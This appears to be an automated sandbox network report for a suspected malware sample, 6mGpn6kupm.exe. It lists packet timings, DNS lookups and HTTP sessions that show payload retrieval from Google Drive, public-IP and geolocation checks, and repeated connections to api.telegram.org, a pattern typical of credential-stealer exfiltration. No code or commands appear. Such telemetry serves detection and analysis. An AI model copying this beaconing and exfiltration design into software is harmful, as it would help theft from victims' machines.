                                                                                                            Jan 10, 2025 21:50:29.610097885 CET44350005149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:29.610157013 CET50005443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:29.610167027 CET44350005149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:29.916520119 CET44350005149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:29.916591883 CET44350005149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:29.916654110 CET50005443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:29.917108059 CET50005443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:29.920183897 CET5000480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:29.921441078 CET5000680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:29.925128937 CET8050004132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:29.925209045 CET5000480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:29.926213026 CET8050006132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:29.926284075 CET5000680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:29.926539898 CET5000680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:29.932688951 CET8050006132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:31.359970093 CET8050006132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:31.361998081 CET50007443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:31.362060070 CET44350007149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:31.362123013 CET50007443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:31.362781048 CET50007443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:31.362797022 CET44350007149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:31.408443928 CET5000680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:31.967333078 CET44350007149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:31.969739914 CET50007443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:31.969786882 CET44350007149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:31.969837904 CET50007443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:31.969849110 CET44350007149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:32.235797882 CET44350007149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:32.235882044 CET44350007149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:32.235961914 CET50007443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:32.236788034 CET50007443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:32.241033077 CET5000680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:32.242290974 CET5000880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:32.245975971 CET8050006132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:32.246104002 CET5000680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:32.247127056 CET8050008132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:32.247226000 CET5000880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:32.247325897 CET5000880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:32.252052069 CET8050008132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:32.919162989 CET8050008132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:32.920520067 CET50009443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:32.920566082 CET44350009149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:32.920636892 CET50009443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:32.920964003 CET50009443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:32.920974970 CET44350009149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:32.970907927 CET5000880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:33.550693035 CET44350009149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:33.552459002 CET50009443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:33.552475929 CET44350009149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:33.552536964 CET50009443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:33.552545071 CET44350009149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:33.809947014 CET44350009149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:33.810044050 CET44350009149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:33.810098886 CET50009443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:33.810543060 CET50009443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:33.813997984 CET5000880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:33.815722942 CET5001080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:33.819056034 CET8050008132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:33.819113970 CET5000880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:33.820580006 CET8050010132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:33.820643902 CET5001080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:33.820760965 CET5001080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:33.825495005 CET8050010132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:34.501948118 CET8050010132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:34.511007071 CET50011443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:34.511048079 CET44350011149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:34.511181116 CET50011443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:34.511472940 CET50011443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:34.511482954 CET44350011149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:34.549166918 CET5001080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:35.131479025 CET44350011149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:35.133379936 CET50011443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:35.133397102 CET44350011149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:35.133495092 CET50011443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:35.133501053 CET44350011149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:35.549534082 CET44350011149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:35.549626112 CET44350011149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:35.549679995 CET50011443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:35.550273895 CET50011443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:35.554956913 CET5001080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:35.555891037 CET5001280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:35.559993029 CET8050010132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:35.560061932 CET5001080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:35.560677052 CET8050012132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:35.560751915 CET5001280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:35.560878992 CET5001280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:35.565594912 CET8050012132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:36.278785944 CET8050012132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:36.280375004 CET50013443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:36.280438900 CET44350013149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:36.280531883 CET50013443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:36.280821085 CET50013443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:36.280838013 CET44350013149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:36.330302000 CET5001280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:36.902545929 CET44350013149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:36.904360056 CET50013443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:36.904407024 CET44350013149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:36.904484034 CET50013443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:36.904491901 CET44350013149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:37.282336950 CET44350013149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:37.282422066 CET44350013149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:37.282594919 CET50013443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:37.292335033 CET50013443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:37.349730015 CET5001280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:37.350814104 CET5001480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:37.354916096 CET8050012132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:37.354965925 CET5001280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:37.355570078 CET8050014132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:37.355631113 CET5001480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:37.355726004 CET5001480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:37.360449076 CET8050014132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:39.054969072 CET8050014132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:39.056901932 CET50015443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:39.056958914 CET44350015149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:39.057063103 CET50015443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:39.057408094 CET50015443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:39.057429075 CET44350015149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:39.096007109 CET5001480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:39.714139938 CET44350015149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:39.716181993 CET50015443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:39.716217995 CET44350015149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:39.716270924 CET50015443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:39.716279984 CET44350015149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:40.200716972 CET44350015149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:40.200841904 CET44350015149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:40.200925112 CET50015443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:40.201442957 CET50015443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:40.204752922 CET5001480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:40.206064939 CET5001680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:40.209669113 CET8050014132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:40.209844112 CET5001480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:40.210823059 CET8050016132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:40.210902929 CET5001680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:40.211007118 CET5001680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:40.215733051 CET8050016132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:41.891834021 CET8050016132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:41.893843889 CET50017443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:41.893882036 CET44350017149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:41.894349098 CET50017443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:41.894349098 CET50017443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:41.894381046 CET44350017149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:41.939728975 CET5001680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:42.528518915 CET44350017149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:42.534398079 CET50017443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:42.534421921 CET44350017149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:42.534485102 CET50017443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:42.534493923 CET44350017149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:42.812026024 CET44350017149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:42.812107086 CET44350017149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:42.812190056 CET50017443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:42.812840939 CET50017443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:42.816863060 CET5001680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:42.818202019 CET5001880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:42.821834087 CET8050016132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:42.821903944 CET5001680192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:42.822979927 CET8050018132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:42.823051929 CET5001880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:42.823199987 CET5001880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:42.827986002 CET8050018132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:44.516010046 CET8050018132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:44.520999908 CET50019443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:44.521037102 CET44350019149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:44.521208048 CET50019443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:44.521502972 CET50019443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:44.521513939 CET44350019149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:44.564696074 CET5001880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:45.145579100 CET44350019149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:45.147537947 CET50019443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:45.147556067 CET44350019149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:45.147619009 CET50019443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:45.147623062 CET44350019149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:45.461563110 CET44350019149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:45.461711884 CET44350019149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:45.461815119 CET50019443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:45.462522984 CET50019443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:45.466532946 CET5001880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:45.469558001 CET5002080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:45.471571922 CET8050018132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:45.471656084 CET5001880192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:45.474483967 CET8050020132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:45.474613905 CET5002080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:45.474809885 CET5002080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:45.479619026 CET8050020132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:46.175745010 CET8050020132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:46.177182913 CET50021443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:46.177242994 CET44350021149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:46.177316904 CET50021443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:46.177670956 CET50021443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:46.177683115 CET44350021149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:46.221837997 CET5002080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:46.796586037 CET44350021149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:46.798496962 CET50021443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:46.798563004 CET44350021149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:46.798649073 CET50021443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:46.798664093 CET44350021149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:47.189940929 CET44350021149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:47.190021038 CET44350021149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:47.190074921 CET50021443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:47.190907001 CET50021443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:47.194081068 CET5002080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:47.195271015 CET5002280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:47.199330091 CET8050020132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:47.199403048 CET5002080192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:47.200084925 CET8050022132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:47.200155973 CET5002280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:47.200298071 CET5002280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:47.205410957 CET8050022132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:47.879390001 CET8050022132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:47.880697012 CET50023443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:47.880745888 CET44350023149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:47.881027937 CET50023443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:47.881212950 CET50023443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:47.881226063 CET44350023149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:47.924037933 CET5002280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:48.551134109 CET44350023149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:48.595895052 CET50023443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:51.463988066 CET8049979132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:51.464066982 CET4997980192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:51.767390966 CET50023443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:51.767421961 CET44350023149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:51.767493010 CET50023443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:51.767501116 CET44350023149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:52.291505098 CET44350023149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:52.291611910 CET44350023149.154.167.220192.168.2.10
                                                                                                            Jan 10, 2025 21:50:52.291692972 CET50023443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:52.292150021 CET50023443192.168.2.10149.154.167.220
                                                                                                            Jan 10, 2025 21:50:52.295335054 CET5002280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:52.295958042 CET5002480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:52.300317049 CET8050022132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:52.300376892 CET5002280192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:52.300765038 CET8050024132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:52.300870895 CET5002480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:52.300959110 CET5002480192.168.2.10132.226.247.73
                                                                                                            Jan 10, 2025 21:50:52.306608915 CET8050024132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:53.977969885 CET8050024132.226.247.73192.168.2.10
                                                                                                            Jan 10, 2025 21:50:54.017796040 CET5002480192.168.2.10132.226.247.73
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 10, 2025 21:49:31.598313093 CET5204953192.168.2.101.1.1.1
                                                                                                            Jan 10, 2025 21:49:31.605470896 CET53520491.1.1.1192.168.2.10
                                                                                                            Jan 10, 2025 21:49:32.739208937 CET5714453192.168.2.101.1.1.1
                                                                                                            Jan 10, 2025 21:49:32.745968103 CET53571441.1.1.1192.168.2.10
                                                                                                            Jan 10, 2025 21:49:36.864227057 CET5096653192.168.2.101.1.1.1
                                                                                                            Jan 10, 2025 21:49:36.871561050 CET53509661.1.1.1192.168.2.10
                                                                                                            Jan 10, 2025 21:49:38.179683924 CET6462553192.168.2.101.1.1.1
                                                                                                            Jan 10, 2025 21:49:38.187149048 CET53646251.1.1.1192.168.2.10
                                                                                                            Jan 10, 2025 21:49:44.655190945 CET5286053192.168.2.101.1.1.1
                                                                                                            Jan 10, 2025 21:49:44.661982059 CET53528601.1.1.1192.168.2.10
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 21:49:31.598313093 CET192.168.2.101.1.1.10x186dStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:32.739208937 CET192.168.2.101.1.1.10x2b62Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:36.864227057 CET192.168.2.101.1.1.10x8381Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:38.179683924 CET192.168.2.101.1.1.10xa867Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:44.655190945 CET192.168.2.101.1.1.10x6044Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 21:49:31.605470896 CET1.1.1.1192.168.2.100x186dNo error (0)drive.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:32.745968103 CET1.1.1.1192.168.2.100x2b62No error (0)drive.usercontent.google.com142.250.186.161A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:36.871561050 CET1.1.1.1192.168.2.100x8381No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:36.871561050 CET1.1.1.1192.168.2.100x8381No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:36.871561050 CET1.1.1.1192.168.2.100x8381No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:36.871561050 CET1.1.1.1192.168.2.100x8381No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:36.871561050 CET1.1.1.1192.168.2.100x8381No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:36.871561050 CET1.1.1.1192.168.2.100x8381No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:38.187149048 CET1.1.1.1192.168.2.100xa867No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:38.187149048 CET1.1.1.1192.168.2.100xa867No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:38.187149048 CET1.1.1.1192.168.2.100xa867No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:38.187149048 CET1.1.1.1192.168.2.100xa867No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:38.187149048 CET1.1.1.1192.168.2.100xa867No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:38.187149048 CET1.1.1.1192.168.2.100xa867No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:38.187149048 CET1.1.1.1192.168.2.100xa867No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:49:44.661982059 CET1.1.1.1192.168.2.100x6044No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            • drive.google.com
                                                                                                            • drive.usercontent.google.com
                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.1049975132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:49:36.881314039 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:49:37.634546041 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 21:49:37.639211893 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 21:49:37.852782965 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 21:49:44.428966045 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
